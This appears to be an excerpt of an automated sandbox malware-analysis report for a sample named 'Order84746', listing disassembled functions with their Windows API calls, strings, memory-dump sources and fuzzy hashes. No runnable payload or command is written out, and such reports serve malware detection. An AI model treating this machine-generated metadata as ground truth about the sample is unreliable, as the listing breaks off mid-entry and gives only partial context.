                          Function 008FB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • GetSysColor.USER32(0000000F), ref: 008FB438
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: 68e3f106fde20314619db6b7b358e0f3e08d2f17c381567135b989769e5ac92f
                          • Instruction ID: 392256e24a9db833e88c6ae112818748305a73151f322c8a2313d44179fd0425
                          • Opcode Fuzzy Hash: 68e3f106fde20314619db6b7b358e0f3e08d2f17c381567135b989769e5ac92f
                          • Instruction Fuzzy Hash: FA41F030505108ABDB245F38DC89BB83B66FB16331F284265FE65CA1E6C770CC41EB25
                          Function 0092690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: 33652aecc3df9c2260e861fc10dd5070f315220204e2b0a9f172a687250ff111
                          • Instruction ID: 497169ab0b4463498ce5d08f4f3278e929fd112b6efd25c8295b9e3e28708077
                          • Opcode Fuzzy Hash: 33652aecc3df9c2260e861fc10dd5070f315220204e2b0a9f172a687250ff111
                          • Instruction Fuzzy Hash: AD41117684522CAEDF65DB94DC45EDF73BCEB84300F0041A6B659A2095EB30ABE58F50
                          Function 0092D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(0097DC00,0097DC00,0097DC00), ref: 0092D7CE
                          • GetDriveTypeW.KERNEL32(?,00993A70,00000061), ref: 0092D898
                          • _wcscpy.LIBCMT ref: 0092D8C2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharDriveLowerType_wcscpy
                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 2820617543-1000479233
                          • Opcode ID: 57a9302e019108f688f7f56a8be85e8407f1a458fe103e47acb3c4da1620b65d
                          • Instruction ID: dae7f2e27af3a862758cc3fcdd5b3b16cb425a0336dd5dcf1eaefd5dc0219981
                          • Opcode Fuzzy Hash: 57a9302e019108f688f7f56a8be85e8407f1a458fe103e47acb3c4da1620b65d
                          • Instruction Fuzzy Hash: EA51F435105344AFC710EF18E881AAFB7A5FF85314F20882DF59A972A6DB31DE05CB52
                          Function 008E936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          • __swprintf.LIBCMT ref: 008E93AB
                          • __itow.LIBCMT ref: 008E93DF
                            • Part of subcall function 00901557: _xtow@16.LIBCMT ref: 00901578
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __itow__swprintf_xtow@16
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 1502193981-2263619337
                          • Opcode ID: d5d307833563b3945d9f4323ec5fda405e045dcf969c7dab50faa4e516e29f6c
                          • Instruction ID: 5d4fbc9c129c7f1e800846a6f8a34e62e91c380bf17e25ea9bfe8e9c920f58b1
                          • Opcode Fuzzy Hash: d5d307833563b3945d9f4323ec5fda405e045dcf969c7dab50faa4e516e29f6c
                          • Instruction Fuzzy Hash: BC41E871504209AFDB24DF7AD941FAAB3E8FF89304F20446EE589D72C1EA71D985CB11
                          Function 0094A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0094A259
                          • CreateCompatibleDC.GDI32(00000000), ref: 0094A260
                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0094A273
                          • SelectObject.GDI32(00000000,00000000), ref: 0094A27B
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0094A286
                          • DeleteDC.GDI32(00000000), ref: 0094A28F
                          • GetWindowLongW.USER32(?,000000EC), ref: 0094A299
                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0094A2AD
                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0094A2B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                          • String ID: static
                          • API String ID: 2559357485-2160076837
                          • Opcode ID: 4199ac775fa94dc863c04a9774411f993b215fa928199c09ecc8ad2d287bc335
                          • Instruction ID: 7ab47b7567bb0239e1b2abec0a592aeeac039d2e4eb0d7b7f6e0337aa1bb0052
                          • Opcode Fuzzy Hash: 4199ac775fa94dc863c04a9774411f993b215fa928199c09ecc8ad2d287bc335
                          • Instruction Fuzzy Hash: 0231BE31645215ABDF119FA4DC49FEB3B6DFF0E360F110218FA29A60A0C7B5D811EBA0
                          Function 00926F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 2620052-3771769585
                          • Opcode ID: 92a00531ad656268d61f497ceb5414c40bde9104e4bcee9a35f2cd9eb1b5f7ff
                          • Instruction ID: 3a7c89f3b805cd11d5ddb68f7f731270b097c7d1b68e219eda10fb837911fa37
                          • Opcode Fuzzy Hash: 92a00531ad656268d61f497ceb5414c40bde9104e4bcee9a35f2cd9eb1b5f7ff
                          • Instruction Fuzzy Hash: 4811E772A08224AFCF14AB74BD49EDA77BCEF80710F040069F155A60D1EFB49A819661
                          Function 0090500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00905047
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • __gmtime64_s.LIBCMT ref: 009050E0
                          • __gmtime64_s.LIBCMT ref: 00905116
                          • __gmtime64_s.LIBCMT ref: 00905133
                          • __allrem.LIBCMT ref: 00905189
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009051A5
                          • __allrem.LIBCMT ref: 009051BC
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009051DA
                          • __allrem.LIBCMT ref: 009051F1
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0090520F
                          • __invoke_watson.LIBCMT ref: 00905280
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                          • Instruction ID: e8b65c949299d459631a646b7c15ae57c32ec8756aca815a7df227c40bfcf7bb
                          • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                          • Instruction Fuzzy Hash: 5871A472B01B1AAFE714AE68CC41BABB3BDAF50764F154229F524D66C1E770D9808FD0
                          Function 00924DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00924DF8
                          • GetMenuItemInfoW.USER32(009A1708,000000FF,00000000,00000030), ref: 00924E59
                          • SetMenuItemInfoW.USER32(009A1708,00000004,00000000,00000030), ref: 00924E8F
                          • Sleep.KERNEL32(000001F4), ref: 00924EA1
                          • GetMenuItemCount.USER32(?), ref: 00924EE5
                          • GetMenuItemID.USER32(?,00000000), ref: 00924F01
                          • GetMenuItemID.USER32(?,-00000001), ref: 00924F2B
                          • GetMenuItemID.USER32(?,?), ref: 00924F70
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00924FB6
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00924FCA
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00924FEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: 16166021a9f81c65fbbde39dcbad6ed91382b1d02bf4319ef4325c101b6925c4
                          • Instruction ID: 677fa5dc83ff0b310c6fe645c489a45b3dce30e97d053b3351cb167411da1d84
                          • Opcode Fuzzy Hash: 16166021a9f81c65fbbde39dcbad6ed91382b1d02bf4319ef4325c101b6925c4
                          • Instruction Fuzzy Hash: 4C61C171A14269AFDB21CFA4ED88AEE7BB8FB85304F150459F412A3299D370AD04DB61
                          Function 00949C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00949C98
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00949C9B
                          • GetWindowLongW.USER32(?,000000F0), ref: 00949CBF
                          • _memset.LIBCMT ref: 00949CD0
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00949CE2
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00949D5A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: dbb45b784a0453d5d23c0e3aa6953ff059bafb2604e4924f8ce3dc2be3e2f1cb
                          • Instruction ID: d489b7492cfc0f85dc2667538fb6e698707e347bf891eb263f2fb9e5610d52d6
                          • Opcode Fuzzy Hash: dbb45b784a0453d5d23c0e3aa6953ff059bafb2604e4924f8ce3dc2be3e2f1cb
                          • Instruction Fuzzy Hash: 2D619C75A00208AFDB21DFA8CC81EEEB7B8EF49704F14415AFA15E7291D774AD41DB90
                          Function 009194E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009194FE
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00919549
                          • VariantInit.OLEAUT32(?), ref: 0091955B
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0091957B
                          • VariantCopy.OLEAUT32(?,?), ref: 009195BE
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 009195D2
                          • VariantClear.OLEAUT32(?), ref: 009195E7
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 009195F4
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009195FD
                          • VariantClear.OLEAUT32(?), ref: 0091960F
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0091961A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 5f825494c7561d1f65c847e42f919e781169f935a79fc26f66e278634bacb0b3
                          • Instruction ID: f92080974af7c13b1ce7d38491f45b4d2a0abbf0954678f8c91799c48c646334
                          • Opcode Fuzzy Hash: 5f825494c7561d1f65c847e42f919e781169f935a79fc26f66e278634bacb0b3
                          • Instruction Fuzzy Hash: 1F412F31E1421DAFCB01DFA4DC549EEBB79FF48354F008069F912A3261DB70AA85DBA1
                          Function 0093BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                          • API String ID: 2862541840-1765764032
                          • Opcode ID: 63760d7c8066fe26c74589ad9f732a0f02ba851247044fa528cd97da136092a3
                          • Instruction ID: d2d8e1ebdd984b2669bc2ba7b25028c019935621e659bbac8efd0cda38013ebf
                          • Opcode Fuzzy Hash: 63760d7c8066fe26c74589ad9f732a0f02ba851247044fa528cd97da136092a3
                          • Instruction Fuzzy Hash: B6919171E00219AFDF24CFA9C844FAEBBB8EF85710F108559F615AB290DB749944CFA0
                          Function 0093ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CoInitialize.OLE32 ref: 0093ADF6
                          • CoUninitialize.COMBASE ref: 0093AE01
                          • CoCreateInstance.COMBASE(?,00000000,00000017,0096D8FC,?), ref: 0093AE61
                          • IIDFromString.COMBASE(?,?), ref: 0093AED4
                          • VariantInit.OLEAUT32(?), ref: 0093AF6E
                          • VariantClear.OLEAUT32(?), ref: 0093AFCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 834269672-1287834457
                          • Opcode ID: 1eda10f28597cdaebde1eb535d2eb08ffa0f0f54f4bad9358d68d2af27b21983
                          • Instruction ID: d0bb3e898b9d701c1e7edeb8ec6e45f8783a414bab358ae6f813cbe8efdb06e3
                          • Opcode Fuzzy Hash: 1eda10f28597cdaebde1eb535d2eb08ffa0f0f54f4bad9358d68d2af27b21983
                          • Instruction Fuzzy Hash: 0F618B71608311AFD721DF64C848B6ABBE8EF89714F10481DF9859B2A2C774ED48CB93
                          Function 00938107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00938168
                          • inet_addr.WS2_32(?), ref: 009381AD
                          • gethostbyname.WS2_32(?), ref: 009381B9
                          • IcmpCreateFile.IPHLPAPI ref: 009381C7
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00938237
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0093824D
                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009382C2
                          • WSACleanup.WS2_32 ref: 009382C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 7d008bccb7308d8de5849f5b8a42d26b27681bbfd3264df483b9f5e9e8880fa2
                          • Instruction ID: 6523da835cd5e6194a3109e5610cf9c3ca7ef9ca6d0f08ba9a925409f036c28a
                          • Opcode Fuzzy Hash: 7d008bccb7308d8de5849f5b8a42d26b27681bbfd3264df483b9f5e9e8880fa2
                          • Instruction Fuzzy Hash: 28517B71608700AFDB209F65CC45B2BBBE9FB49350F048829FA65DB2A1DB74E905DF42
                          Function 0092E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092E396
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0092E40C
                          • GetLastError.KERNEL32 ref: 0092E416
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0092E483
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 50d4afaf4b199ff25c68bb8aaae7e19fe01b57b232bfe4fb8dd5d046a0151926
                          • Instruction ID: 4e93ef510e8b51e0bc589f9a589ae7439d4312fc7c3873027f71a4df1ef1e6c2
